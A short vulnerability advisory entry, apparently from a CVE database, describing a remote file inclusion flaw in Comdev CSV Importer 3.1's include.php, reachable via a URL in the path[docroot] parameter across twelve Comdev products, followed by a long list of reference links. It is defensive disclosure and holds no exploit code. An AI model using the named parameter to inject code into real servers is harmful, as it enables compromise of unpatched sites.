PHP remote file inclusion vulnerability in include.php in Comdev CSV Importer 3.1 and possibly 4.1, as used in (1) Comdev Contact Form 3.1, (2) Comdev Customer Helpdesk 3.1, (3) Comdev Events Calendar 3.1, (4) Comdev FAQ Support 3.1, (5) Comdev Guestbook 3.1, (6) Comdev Links Directory 3.1, (7) Comdev News Publisher 3.1, (8) Comdev Newsletter 3.1, (9) Comdev Photo Gallery 3.1, (10) Comdev Vote Caster 3.1, (11) Comdev Web Blogger 3.1, and (12) Comdev eCommerce 3.1, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: it has been reported that 4.1 versions might also be affected.
secunia.com/advisories/22133
secunia.com/advisories/22134
secunia.com/advisories/22135
secunia.com/advisories/22147
secunia.com/advisories/22149
secunia.com/advisories/22151
secunia.com/advisories/22153
secunia.com/advisories/22154
secunia.com/advisories/22157
secunia.com/advisories/22168
secunia.com/advisories/22169
secunia.com/advisories/22170
securityreason.com/securityalert/1658
www.osvdb.org/29299
www.osvdb.org/29300
www.osvdb.org/29301
www.osvdb.org/29302
www.osvdb.org/29303
www.osvdb.org/29304
www.osvdb.org/29305
www.osvdb.org/29306
www.osvdb.org/29307
www.osvdb.org/29308
www.osvdb.org/29309
www.osvdb.org/29310
www.osvdb.org/29311
www.securityfocus.com/archive/1/447184/100/0/threaded
www.securityfocus.com/archive/1/447185/100/0/threaded
www.securityfocus.com/archive/1/447186/100/0/threaded
www.securityfocus.com/archive/1/447187/100/0/threaded
www.securityfocus.com/archive/1/447188/100/0/threaded
www.securityfocus.com/archive/1/447190/100/0/threaded
www.securityfocus.com/archive/1/447192/100/0/threaded
www.securityfocus.com/archive/1/447193/100/0/threaded
www.securityfocus.com/archive/1/447194/100/0/threaded
www.securityfocus.com/archive/1/447201/100/0/threaded
www.securityfocus.com/archive/1/447207/100/0/threaded
www.securityfocus.com/archive/1/447209/100/0/threaded
www.securityfocus.com/archive/1/447213/100/0/threaded
www.vupen.com/english/advisories/2006/3803
www.vupen.com/english/advisories/2006/3804
www.vupen.com/english/advisories/2006/3805
www.vupen.com/english/advisories/2006/3806
www.vupen.com/english/advisories/2006/3807
www.vupen.com/english/advisories/2006/3808
www.vupen.com/english/advisories/2006/3809
www.vupen.com/english/advisories/2006/3810
www.vupen.com/english/advisories/2006/3811
www.vupen.com/english/advisories/2006/3812
www.vupen.com/english/advisories/2006/3813
www.vupen.com/english/advisories/2006/3814
www.vupen.com/english/advisories/2006/3815
exchange.xforce.ibmcloud.com/vulnerabilities/29220